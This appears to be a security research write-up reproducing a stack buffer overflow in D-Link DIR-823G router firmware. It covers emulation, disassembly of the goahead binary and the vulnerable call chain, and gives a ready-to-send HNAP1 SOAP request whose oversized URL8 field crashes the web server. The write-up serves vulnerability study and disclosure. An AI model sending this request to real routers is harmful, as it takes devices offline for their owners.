Vulnerability Description
D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability that originates from the URL field handled by SetParentsControlInfo (the HNAP1 parental-control action).
Reproduction Tools
VM: Ubuntu 18.04
Firmware version: DIR823G_V1.0.2B05_20181207.bin
Tools: FirmAE, binwalk, IDA
Emulating the Router
Emulate the router with FirmAE. run.sh takes the mode (-r = run), a brand label and the firmware image; the image must be the DIR-823G file listed above:
sudo ./run.sh -r LBT /home/ccc/DIR823G_V1.0.2B05_20181207.bin
Once emulation is up, the router's web interface (goahead) is reachable at 192.168.0.1, which is the address the PoC below targets.
Vulnerability Analysis
The CVE description locates the bug in the URL variable of SetParentsControlInfo. Searching the firmware's file system for that string shows that SetParentsControlInfo appears in the goahead binary, so that binary is loaded into IDA for disassembly.
Search for the "URL" string and look at the functions that reference it.
Going through the referencing functions one by one, the stack overflow turns out to be in sub_469F78.
In sub_469F78 the overflow comes from the strncpy calls: the character arrays v104 to v111 are each 64 bytes and hold URL1 to URL8 respectively, but the copy length is not bounded by that 64-byte size, so the length of URL1 to URL8 is effectively unrestricted and an over-long value overwrites the stack.
Working backwards from there, the call chain is: main() -> sub_423F90() -> sub_42383C() -> (LOAD segment) sub_46B6E8 -> sub_469F78
main calls sub_423F90 and branches on its return value. sub_423F90 calls sub_42383C to handle /HNAP1 requests.
sub_42383C compares the requested action against the off_588D80 table, which maps HNAP action names to their handler functions; sub_46B6E8 is one of the entries in that table.
sub_46B6E8 is therefore the SetParentsControlInfo handler.
Naming SetParentsControlInfo as the action in the request header (SOAPAction) drives this call chain and, with an over-long URL value in the body, triggers the stack overflow.
Reproduction
PoC
1. Write a Python script that sends the request (see below), or
2. Use Firefox to edit and resend a captured request: open Developer Tools -> Network -> 192.168.0.1/HNAP1/ (any HNAP1 request will do) -> Resend (top right).
In the New Request view, replace the SOAPAction header and the Body with the values below, then click Send.
SOAPAction:
"http://purenetworks.com/HNAP1/SetParentsControlInfo"
Body:
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetParentsControlInfo xmlns="http://purenetworks.com/HNAP1/"><UsersInfo><HostName>1</HostName><Mac>1</Mac><IndexEnable>1</IndexEnable><StartTime>00:00:00</StartTime><EndTime>23:59:00</EndTime><Week>Sun</Week><UrlEnable>1</UrlEnable><URL1>cp.com</URL1><URL2></URL2><URL3></URL3><URL4></URL4><URL5></URL5><URL6></URL6><URL7></URL7><URL8>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</URL8><GroupId>1</GroupId></UsersInfo></SetParentsControlInfo></soap:Body></soap:Envelope>
The URL8 value is a run of "A"s far longer than the 64-byte stack buffer that receives it; any of URL1 to URL8 would work the same way.
The emulated router stops responding (goahead crashes), which confirms the vulnerability.